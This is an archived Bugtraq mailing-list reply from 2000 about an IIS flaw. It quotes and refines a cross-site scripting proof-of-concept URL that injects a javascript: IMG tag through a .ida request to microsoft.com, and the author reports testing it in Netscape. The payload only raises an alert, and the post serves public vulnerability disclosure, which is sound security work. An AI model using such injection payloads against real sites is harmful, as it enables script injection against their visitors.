[13385] in bugtraq
Re: IIS still revealing paths for web directories
daemon@ATHENA.MIT.EDU (Taneli Huuskonen)
Mon Jan 17 17:46:23 2000
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Message-Id: <200001151054.MAA11218@sirppi.helsinki.fi>
Date: Sat, 15 Jan 2000 12:54:11 +0200
Reply-To: Taneli Huuskonen <huuskone@CC.HELSINKI.FI>
From: Taneli Huuskonen <huuskone@CC.HELSINKI.FI>
X-To: Scott Buchanan <scott@AXE.NET.AU>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <387E5C0F.AB74508E@axe.net.au> from Scott Buchanan at "Jan 14,
2000 10:13:19 am"
-----BEGIN PGP SIGNED MESSAGE-----
> http://www.microsoft.com/%3CIMG%20SRC=javascript:alert(%34window.location:%34%43window.location)%3E.ida
I tested the following on Netscape Lite 4.51/Export, 01-Mar-99 for
Linux:
http://www.microsoft.com/%3CIMG%20SRC=%22javascript:alert('window.location='%2Bwindow.location)%22%3E.ida
Taneli Huuskonen
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv
iQB1AwUBOIBRiAUw3ir1nvhZAQFgXwL/fpZ8guSnBTLd2P9bBuU488z8mpp2frFR
/8zL1Nd1NopTigYmf1rUWgwX+tuaMm+048KceVBC1aonrtP8cVhB6VSyjWqpJDHN
kqCio1oCXtQ83spJmq01d34/aGBjoMsF
=F7pK
-----END PGP SIGNATURE-----
--
I don't | All messages will be PGP signed, | Fight for your right to
speak for | encrypted mail preferred. Keys: | use sealed envelopes.
the Uni. | http://www.helsinki.fi/~huuskone/ | http://www.gilc.org/
